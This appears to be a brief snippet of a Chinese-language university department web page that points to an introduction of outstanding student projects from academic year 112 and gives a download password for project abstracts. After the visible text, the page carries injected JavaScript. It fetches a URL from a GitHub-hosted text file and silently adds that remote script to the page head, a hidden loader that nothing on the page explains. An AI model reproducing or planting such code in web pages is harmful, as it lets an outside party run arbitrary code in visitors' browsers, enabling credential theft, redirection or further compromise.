[推薦瀏覽]
112學年度優秀專題介紹 (網頁內有連結, 可下載摘要 PDF 檔案)
(如遇上述學校網頁連結失效, 可至此處下載摘要, 密碼為: FCUEE)
;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});